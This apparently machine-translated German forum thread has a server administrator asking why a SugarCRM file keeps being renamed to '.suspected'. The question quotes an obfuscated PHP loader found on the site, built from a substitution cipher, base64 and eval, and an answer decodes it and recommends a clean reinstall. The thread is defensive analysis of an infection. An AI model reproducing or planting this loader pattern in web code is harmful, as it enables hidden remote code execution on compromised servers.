php-Datei automatisch in php.suspeced umbenannt

Question

Seit den letzten 4 Tagen haben wir seltsame Problem auf unserem Produktionsserver (AWS EC2-Instanz) speziell für nur eine Website, die SugarCRM ist.

Ausgabe wird /home/site_folder/public_html/include/MassUpdate.php Datei automatisch zu umbenannt /home/site_folder/public_html/include/MassUpdate.php.suspected

Dies geschieht 2-3 mal an einem Tag mit 3-4 Stunden Abstand. Dieses Problem tritt nur bei einer bestimmten Site auf, selbst wenn es nicht für das Staging der Replik der gleichen Site auftritt. Ich habe sogar den Code dieser Datei von beiden Seiten überprüft, es ist dasselbe.

Wir haben gegoogelt und gefunden, ein solches Problem tritt vor allem für Wordpress-Websites und es könnte wegen Angriff sein. Aber wir haben unseren Server gegen den Angriff überprüft, es gibt keinen. Außerdem wird kein Viren-/Malware-Scan auf dem Server ausgeführt.

Was sollen wir tun?

Update: Wir haben einige Dinge, nachdem Wir egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ ausgeführt durch diese link gehen und fand, dass es nur wenige Dateien mit Beispielcode folgt.

<?php 
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];} 
$ixo="base64_decode";return $ixo($ggy);} 
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'. 
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X='; 
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f'); 
eval(flnftovr($s, $koicev));?> 

Scheint einige Malware, wie wir es dauerhaft entfernen?

Dank

Answer 1

Es etwas verschleiert ist, aber ich habe de-verschleiert it.The Funktion flnftovr einen String und ein Array als Argument annimmt. Es schafft einen neuen Zeichenfolge $ GGY unter Verwendung der Formel

isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];} 

es dann preppends base64_decode auf den String.

Die Zeichenfolge ist $ s, das Array ist $ koicev. Es ergibt sich dann das Ergebnis dieser Manipulation. So schließlich wird eine Zeichenfolge erstellt:

base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=) 

Also, was auf Ihrem Server wird tatsächlich ausgeführt werden soll:

@ini_set('error_log', NULL); 
@ini_set('log_errors', 0); 
@ini_set('max_execution_time', 0); 
@set_time_limit(0); 

if(isset($_SERVER) 
encode(serialize($res)); 
} 

Wenn Sie dies nicht erstellt haben und Sie vermuten, dass Ihre Website gehackt wurde, würde ich empfehlen, dass Sie den Server bereinigen und eine neue Installation aller auf Ihrem Server ausgeführten Apps erstellen.